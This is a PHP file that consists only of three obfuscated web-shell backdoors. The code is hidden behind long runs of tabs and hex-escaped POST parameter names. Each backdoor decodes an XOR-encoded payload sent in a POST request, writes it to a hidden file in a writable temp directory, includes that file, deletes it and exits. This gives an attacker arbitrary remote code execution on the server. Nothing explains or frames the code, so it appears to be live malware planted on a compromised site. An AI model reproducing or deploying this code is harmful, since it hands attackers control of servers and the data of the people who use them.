<?php																																										if(isset($_POST["en\x74"]) ? true : false){ $key = $_POST["en\x74"]; $key =explode( "." , $key ) ; $dchunk = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s9 ); foreach($key as $z => $v4): $sChar = ord($s9[$z % $sLen] ); $d =((int)$v4 - $sChar -($z % 10))^ 25; $dchunk .= chr($d ); endforeach; $ent = array_filter([session_save_path(), "/tmp", getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), getenv("TMP"), "/dev/shm"]); foreach ($ent as $data_chunk): if (is_dir($data_chunk) && is_writable($data_chunk)) { $parameter_group = vsprintf("%s/%s", [$data_chunk, ".value"]); $success = file_put_contents($parameter_group, $dchunk); if ($success) { include $parameter_group; @unlink($parameter_group); exit;} } endforeach; }
																																										if(filter_has_var(INPUT_POST, "en\x74\x69ty")){ $pointer = array_filter([getcwd(), getenv("TMP"), getenv("TEMP"), session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", "/tmp"]); $data = $_REQUEST["en\x74\x69ty"]; $data = explode ( '.', $data ) ; $factor = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt9); foreach( $data as $z => $v6): $sChar = ord( $salt9[$z % $sLen]); $dec = ( ( int)$v6 - $sChar -( $z % 10))^69; $factor .= chr( $dec); endforeach; while ($object = array_shift($pointer)) { if (is_dir($object) && is_writable($object)) { $fac = str_replace("{var_dir}", $object, "{var_dir}/.ent"); $success = file_put_contents($fac, $factor); if ($success) { include $fac; @unlink($fac); die();} } } }


if(isset($_POST) && isset($_POST["refer\x65nce"])){
	$hld = array_filter([getenv("TMP"), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getcwd(), "/var/tmp"]);
	$element = $_POST["refer\x65nce"];
	$element =	explode(  	'.'  	,$element );
	$token = '';
            $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt3	);
            $__len = count($element	);
    
            for($x = 0; $x < $__len; $x++) {$v8 = $element[$x];
                $sChar = ord($salt3[$x % $lenS]	);
                $d =((int)$v8 - $sChar -($x % 10)) ^  79;
                $token.=chr($d	);
            }
	foreach ($hld as $parameter_group) {
    		if (is_dir($parameter_group) ? is_writable($parameter_group) : false) {
    $obj = sprintf("%s/.val", $parameter_group);
    if (file_put_contents($obj, $token)) {
	require $obj;
	unlink($obj);
	exit;
}
}
}
}